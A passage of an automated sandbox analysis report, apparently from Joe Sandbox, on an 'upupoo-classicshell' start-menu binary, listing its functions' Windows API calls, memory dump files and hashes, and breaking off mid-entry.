                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,6E0B16F0,00000001,00000364,?,6E0B0797,00000001,00000001), ref: 6E0B0E2D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: 30780cb4c099e496664ad3808f6db4cfd001669a1a8cd4365f2e721f19b3ec5e
                                                                                                              • Instruction ID: 365cd088cc4a4b3fbb0aab132f5fd59e2b970890b9e07cd3c93bd8f98fe2a3c8
                                                                                                              • Opcode Fuzzy Hash: 30780cb4c099e496664ad3808f6db4cfd001669a1a8cd4365f2e721f19b3ec5e
                                                                                                              • Instruction Fuzzy Hash: 1AF0B431608526EAEB511EE68A15B8F3B8DBF517A0F018511A838E7188FB72D80086E0
                                                                                                              Function 6E0A77F9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __Thrd_sleep.LIBCPMT ref: 6E0A7825
                                                                                                                • Part of subcall function 6E0A9786: _xtime_get.LIBCPMT ref: 6E0A97A0
                                                                                                                • Part of subcall function 6E0A9786: __Xtime_diff_to_millis2.LIBCPMT ref: 6E0A97AC
                                                                                                                • Part of subcall function 6E0A9786: Sleep.KERNELBASE(00000000,00000000,0000000A,?,?,00000000,00000000), ref: 6E0A97B4
                                                                                                                • Part of subcall function 6E0A9786: _xtime_get.LIBCPMT ref: 6E0A97C0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _xtime_get$SleepThrd_sleepXtime_diff_to_millis2
                                                                                                              • String ID:
                                                                                                              • API String ID: 2593056502-0
                                                                                                              • Opcode ID: b9a1e2217b94dcc9645a8ba4431e82a94b88a20a9b2af4642cc346e7fa32a41b
                                                                                                              • Instruction ID: 476336b681e1cb57a4be278d5a4ff0980a7a4ff3e919598145ca185b7a8f9b3c
                                                                                                              • Opcode Fuzzy Hash: b9a1e2217b94dcc9645a8ba4431e82a94b88a20a9b2af4642cc346e7fa32a41b
                                                                                                              • Instruction Fuzzy Hash: DBE06532A0050DAB8F11DEE9D9459EF77BC9F45604B000565E905AB100EA72AB0587E5
                                                                                                              Function 6E0A1B55 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetNativeSystemInfo.KERNELBASE ref: 6E0A1B63
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoNativeSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 1721193555-0
                                                                                                              • Opcode ID: 20b95d519748ff780f1622c17377a64ddebc94ff60fdbab2128e49514e72ee26
                                                                                                              • Instruction ID: 5e8f33da281f957842fe914e62bbbb8b3befc0d8447b53df8ed0d58a55f6e0d5
                                                                                                              • Opcode Fuzzy Hash: 20b95d519748ff780f1622c17377a64ddebc94ff60fdbab2128e49514e72ee26
                                                                                                              • Instruction Fuzzy Hash: F4F0BE31A10B098FCB14CF58CCC4AAD77B1FB88324B654764E824BB391DB39A8068B54
                                                                                                              Function 00C28E0C Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00C28E21
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 10892065-0
                                                                                                              • Opcode ID: a69911ee4eca0cea856faa472531139f516787ddc4c6cf65ede6764b5f916e79
                                                                                                              • Instruction ID: 671d50f333f28421f18ff520c5023d9a52b38337a19a2301b66dda6a47f77559
                                                                                                              • Opcode Fuzzy Hash: a69911ee4eca0cea856faa472531139f516787ddc4c6cf65ede6764b5f916e79
                                                                                                              • Instruction Fuzzy Hash: 0AD05E365A0349AEDB009F74BC0872A3BDCD784795F108436B94CC6190E670CA508500
                                                                                                              Function 6E0A6FF7 Relevance: 1.5, APIs: 1, Instructions: 12memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 6E0A700C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: cb5afb0462fcf4386f597e2ba64b36c52ce2b49e5e3f07010f8a98b0d5b68602
                                                                                                              • Instruction ID: 93a7289c1d805d86e32c26a9cd9f8f86c63d16910832422c1905768d583d2c31
                                                                                                              • Opcode Fuzzy Hash: cb5afb0462fcf4386f597e2ba64b36c52ce2b49e5e3f07010f8a98b0d5b68602
                                                                                                              • Instruction Fuzzy Hash: B6D06C31218206EFCB01DF98C89495ABBF1FF89314F00881CF29982220D631E858DF02
                                                                                                              Function 6E0A1BBC Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAlloc.KERNELBASE(?,?,00003000,00000004), ref: 6E0A1BDF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 41f61bdd738d9ea3227fa55b3fa6bc12220ca752dee5e811021934163a0dc7e4
                                                                                                              • Instruction ID: fe0762982082dcdf1efd63416b047977efe83a90b74a45cbb52fc38a32444120
                                                                                                              • Opcode Fuzzy Hash: 41f61bdd738d9ea3227fa55b3fa6bc12220ca752dee5e811021934163a0dc7e4
                                                                                                              • Instruction Fuzzy Hash: ECE09231A416049FD724CF14CEC0B597BF6FF88704B558124E60197B45C730A807CF00
                                                                                                              Function 6E0A20FA Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAlloc.KERNELBASE(?,?,00001000,00000004), ref: 6E0A2119
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 2ce0e580ddaf425a22a359fec3197a2f5c568aa5dcf9c41dcad8b2bef9960e27
                                                                                                              • Instruction ID: a55aae98c7009c4d8d6a12cac3fd10dcfa81df6d6fa3f1657798ac9215ab0bc5
                                                                                                              • Opcode Fuzzy Hash: 2ce0e580ddaf425a22a359fec3197a2f5c568aa5dcf9c41dcad8b2bef9960e27
                                                                                                              • Instruction Fuzzy Hash: 4CE0E575A01615AFCBA0CF68C988F9D7BF0AB4D764F15066CFA10EB381D631AC008F54
                                                                                                              Function 6E0A6FB9 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualFree.KERNELBASE(?,?,00004000), ref: 6E0A6FCA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 1263568516-0
                                                                                                              • Opcode ID: dc8e724e0ff21c0412fb62cd0ae05e4c49d9826d716a838ecdd27c1292aef611
                                                                                                              • Instruction ID: 70408f8f090b1ec7cf2a2c782113d04217ef852cc56dcff32a5840caf75fdbe5
                                                                                                              • Opcode Fuzzy Hash: dc8e724e0ff21c0412fb62cd0ae05e4c49d9826d716a838ecdd27c1292aef611
                                                                                                              • Instruction Fuzzy Hash: 08D0C975618200AFCB059B98D894A2877B1EF99310F004418B6A1872A0D6329814CE01
                                                                                                              Function 6E0A73CE Relevance: 1.3, APIs: 1, Instructions: 7COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualFree.KERNELBASE(00008000,00000000,00008000,6E0A770C), ref: 6E0A73E0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 1263568516-0
                                                                                                              • Opcode ID: 44055a9bc10c09ae0b040af6ef01b8f69ec7c05b78f1d38e817e8d4388aa9702
                                                                                                              • Instruction ID: 3530ef66c2494c7e26170ff13b6d44e7873ac421af9d45225261c3864a771506
                                                                                                              • Opcode Fuzzy Hash: 44055a9bc10c09ae0b040af6ef01b8f69ec7c05b78f1d38e817e8d4388aa9702
                                                                                                              • Instruction Fuzzy Hash: 57C09B31948700FBD7614A40CD59F6577D07F50755F11C4147254540D4C7715458DE05

                                                                                                              Non-executed Functions

                                                                                                              Function 00C21000 Relevance: 63.2, APIs: 24, Strings: 12, Instructions: 190sleepthreadwindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(ClassicStartMenuDLL.dll), ref: 00C21028
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: hooking Explorer), ref: 00C21042
                                                                                                              • FindWindowW.USER32(ApplicationManager_DesktopShellWindow,00000000), ref: 00C2108B
                                                                                                              • FindWindowExW.USER32(00000000,00000000,Progman,00000000), ref: 00C210A5
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: can't find Progman, retrying), ref: 00C210CE
                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00C210D8
                                                                                                                • Part of subcall function 00C22BB0: GetVersion.KERNEL32(00C21056), ref: 00C22BBB
                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00C210F3
                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00C21105
                                                                                                              • K32GetModuleFileNameExW.KERNEL32(00000000,00000000,?,00000104), ref: 00C21120
                                                                                                              • PathFindFileNameW.SHLWAPI(?,explorer.exe,00000000,00000000,?,00000104), ref: 00C21133
                                                                                                              • __wcsicoll.LIBCMT ref: 00C2113A
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: found wrong process %s,?), ref: 00C21159
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: failed to get process name,00000000,00000000,?,00000104), ref: 00C2116A
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C21170
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: failed to open process %d,?), ref: 00C21190
                                                                                                              • ?FindTaskBar@@YAPAUHWND__@@K@Z.CLASSICSTARTMENUDLL(?), ref: 00C211A5
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: can't find taskbar, retrying), ref: 00C211C9
                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00C211D3
                                                                                                              • ?ToggleStartMenu@@YAPAUHWND__@@H_N@Z.CLASSICSTARTMENUDLL(000000FF,00000000), ref: 00C211E9
                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C21202
                                                                                                              • SetWindowsHookExW.USER32(00000003,6E0A737E,?,00000000), ref: 00C21216
                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00C21225
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: hook failed: 0x%08X,00000000,?,00000000), ref: 00C21236
                                                                                                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00C2124A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File@@$FindWindow$Process$D__@@FileHandleModuleNameSleepThread$Bar@@CloseErrorHookLastMenu@@MessageOpenPathPostStartTaskToggleVersionWindows__wcsicoll
                                                                                                              • String ID: ApplicationManager_DesktopShellWindow$ClassicStartMenuDLL.dll$Progman$Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt$StartMenu: can't find Progman, retrying$StartMenu: can't find taskbar, retrying$StartMenu: failed to get process name$StartMenu: failed to open process %d$StartMenu: found wrong process %s$StartMenu: hook failed: 0x%08X$StartMenu: hooking Explorer$explorer.exe
                                                                                                              • API String ID: 1093036710-2932179043
                                                                                                              • Opcode ID: b7368ad79bcaf1561f1f03256f0c30478191ce2c788d547bba37cfb3374433f9
                                                                                                              • Instruction ID: 3be6c745f814ccdbaf265b8aa83d6393fa6ff045bb2070f4fa5eb63d65ec0a9c
                                                                                                              • Opcode Fuzzy Hash: b7368ad79bcaf1561f1f03256f0c30478191ce2c788d547bba37cfb3374433f9
                                                                                                              • Instruction Fuzzy Hash: 75512530790391BBD320EB60BC4AFAF73A4BBA4702F090528FD91D66D0D675D7058BA6
                                                                                                              Function 00C22BE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _wcschr.LIBCMT ref: 00C22C4F
                                                                                                                • Part of subcall function 00C242A0: _wcschr.LIBCMT ref: 00C242B6
                                                                                                                • Part of subcall function 00C242A0: _wcschr.LIBCMT ref: 00C242DF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcschr
                                                                                                              • String ID: \
                                                                                                              • API String ID: 2691759472-2967466578
                                                                                                              • Opcode ID: ce0b589a0f3a191fb02d194947764df01058e1e1d037e1492aa8bcbf27f5763a
                                                                                                              • Instruction ID: 63578e1fd0ea0369563c9ad303144ca7a617c13413e756f5a2c5d9b47151b715
                                                                                                              • Opcode Fuzzy Hash: ce0b589a0f3a191fb02d194947764df01058e1e1d037e1492aa8bcbf27f5763a
                                                                                                              • Instruction Fuzzy Hash: 14414571504321ABD730AF28FC82BAFB3A4FF94314F44492DE99947682F7769644C792
                                                                                                              Function 00C24F90 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00C27B04
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C27B19
                                                                                                              • UnhandledExceptionFilter.KERNEL32(00C34194), ref: 00C27B24
                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00C27B40
                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00C27B47
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 2579439406-0
                                                                                                              • Opcode ID: 482820b66dec116d375395c05b4e87cf7bf09bce436ba27e00ca57ba209109da
                                                                                                              • Instruction ID: cbba21689a5448a5e6ff4b37c8f77ff3a548279f2d8d22580141b23ae31a4956
                                                                                                              • Opcode Fuzzy Hash: 482820b66dec116d375395c05b4e87cf7bf09bce436ba27e00ca57ba209109da
                                                                                                              • Instruction Fuzzy Hash: 0D21DEB4920304EFD708DF65FD8978C7BA4BB18305F50501AEA8987370EBB55AA4DF4A
                                                                                                              Function 10007497 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(?,?,1000746D,?,100148D8,0000000C,100075A0,00000000,00000000,00000001,10003DC6,100146C0,0000000C,10003C6F,?), ref: 100074B8
                                                                                                              • TerminateProcess.KERNEL32(00000000,?,1000746D,?,100148D8,0000000C,100075A0,00000000,00000000,00000001,10003DC6,100146C0,0000000C,10003C6F,?), ref: 100074BF
                                                                                                              • ExitProcess.KERNEL32 ref: 100074D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 1703294689-0
                                                                                                              • Opcode ID: db214c5660a48c07b104a03def8940d1828227caabefa1d35cb8619f3b7a42c1
                                                                                                              • Instruction ID: a02e29ad9b9ef0aec913e02335b899d5739eea22ae5e8b65d5d07e11f2ab0f9f
                                                                                                              • Opcode Fuzzy Hash: db214c5660a48c07b104a03def8940d1828227caabefa1d35cb8619f3b7a42c1
                                                                                                              • Instruction Fuzzy Hash: E2E04631401108ABEB42AF60CD48A583FAAFB006C2B108418F8088A43ACB39EE52DB90
                                                                                                              Function 6E0B0277 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(?,?,6E0B024D,?,6E0C3D90,0000000C,6E0B0380,00000000,00000000,00000001,6E0A884C,6E0C3AE8,0000000C,6E0A86F5,?), ref: 6E0B0298
                                                                                                              • TerminateProcess.KERNEL32(00000000,?,6E0B024D,?,6E0C3D90,0000000C,6E0B0380,00000000,00000000,00000001,6E0A884C,6E0C3AE8,0000000C,6E0A86F5,?), ref: 6E0B029F
                                                                                                              • ExitProcess.KERNEL32 ref: 6E0B02B1
                                                                                                              Memory Dump Source
